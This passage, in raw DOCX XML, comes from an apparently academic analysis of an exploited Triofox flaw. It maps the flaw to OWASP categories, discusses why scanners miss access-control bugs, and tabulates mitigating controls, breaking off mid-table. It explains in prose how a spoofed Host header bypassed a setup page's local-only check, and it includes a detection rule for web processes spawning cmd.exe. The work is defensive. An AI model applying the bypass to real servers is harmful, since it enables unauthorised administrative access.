        <w:t xml:space="preserve">A02 rose to second place in 2025 and explicitly covers unnecessary features, pages, and accounts left enabled, and insecure default configurations. Two configuration conditions made the Triofox instance exploitable. Setup pages that should have been disabled after installation remained reachable, which matches the category's concern with testing and setup functionality left live in production. And the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TrustedHostIp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting, the one remaining barrier when the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> check was bypassed, was optional and, in the exploited configuration, effectively absent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The line between A02 and A01 here is worth drawing carefully. The missing server-side check is the access control flaw (A01). That the deployment left optional hardening unset, and that initialisation functionality was not disabled post-setup, are configuration and deployment weaknesses (A02). Both are real; they operate at different layers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>7.5  A07 and A09 (contributory and detection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Authentication Failures (A07) is contributory rather than central. The attacker did not defeat Triofox's authentication by cracking a credential or forging a token; they bypassed the need for it entirely by reaching account-creation functionality without authenticating. The CVE record itself notes authentication bypass (CAPEC-115) as an impact. It is more accurate to say authentication was rendered irrelevant than to say it failed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Logging and Alerting Failures (A09) is the category the incident both validates and complicates. Triofox's own preventive and logging posture did not stop or flag the compromise; the decisive signal came from external detection content in Google SecOps, which correlated the web process spawning a shell with suspicious file and tunnelling activity. A09 in 2025 emphasises alerting and response, not just log collection, and this incident is a clean illustration: the presence of effective, well-tuned alerting, wherever it lived, is what converted a silent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>-level compromise into a 16-minute containment. The lesson is not that logging failed, but that it must exist at a layer the attacker does not control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>7.6  What testing would have found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The academic literature is consistent on one point that bears directly here: broken access control is the hardest of the major categories for automated tools to find, because a scanner cannot know what a user is supposed to be allowed to do. Anas, Elgamal, and Youssef, surveying detection techniques, note that identifying broken access control requires thorough knowledge of the application's intended behaviour, which generic scanners lack. Amankwah and colleagues reach a compatible conclusion: even capable commercial and open-source scanners need broader coverage, produce false positives, and perform worst on logic and authorisation flaws. Austin, Holmgreen, and Williams, comparing discovery techniques on a web application, found that no single technique dominates and that manual and automated methods each find flaws the others miss, with automated tools faster per vulnerability but narrower in what they catch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The implication for Triofox is specific. An off-the-shelf scanner pointed at the application would likely have crawled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AdminDatabase.aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, received the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AccessDenied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> redirect, and marked the page protected. The flaw only appears when a tester forms the hypothesis that the redirect is conditional on a client-controlled value and tests the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>-header variant by hand. This is why the proposed methodology below is manual and hypothesis-driven, not scanner-driven.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>8  Solutions and Model Evaluation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>8.1  Controls mapped to the chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The most useful way to evaluate controls is to ask, for each link in Figure 2, which control would have broken or exposed it. Table 5 does this. The point is not that any one control is sufficient; it is that the chain offered several independent opportunities to stop it, and a defence-in-depth posture needs only one of them to hold.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Controls evaluated against the documented attack chain.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblW w:w="9355" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2494"/>
        <w:gridCol w:w="5159"/>
        <w:gridCol w:w="1701"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5159"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Effect on the chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stage interrupted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Server-side origin validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5159"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Decide “local” from the socket (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>REMOTE_ADDR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">), never the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Host</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> header; reject requests bearing </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>X-Forwarded-For</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>. This is the actual vendor fix.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1 (prevents)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Protect initialisation functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5159"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Disable or session-gate setup pages once setup completes; redirect to login, not to a reusable setup flow.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1–2 (prevents)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Least privilege for integrations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5159"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Run the anti-virus scanner in a reduced-rights context; validate or allowlist the scanner executable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>3 (contains)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Egress and application-layer controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5159"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Restrict outbound connections from the server; a web app server should not initiate arbitrary HTTP or SSH egress.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>4, 6 (contains)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Patch management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5159"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Apply the 26 July fix before the 24 August exploitation; track time-to-patch for internet-facing assets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>all (prevents)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Behavioural detection and alerting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5159"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Alert on a web worker spawning </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>cmd.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
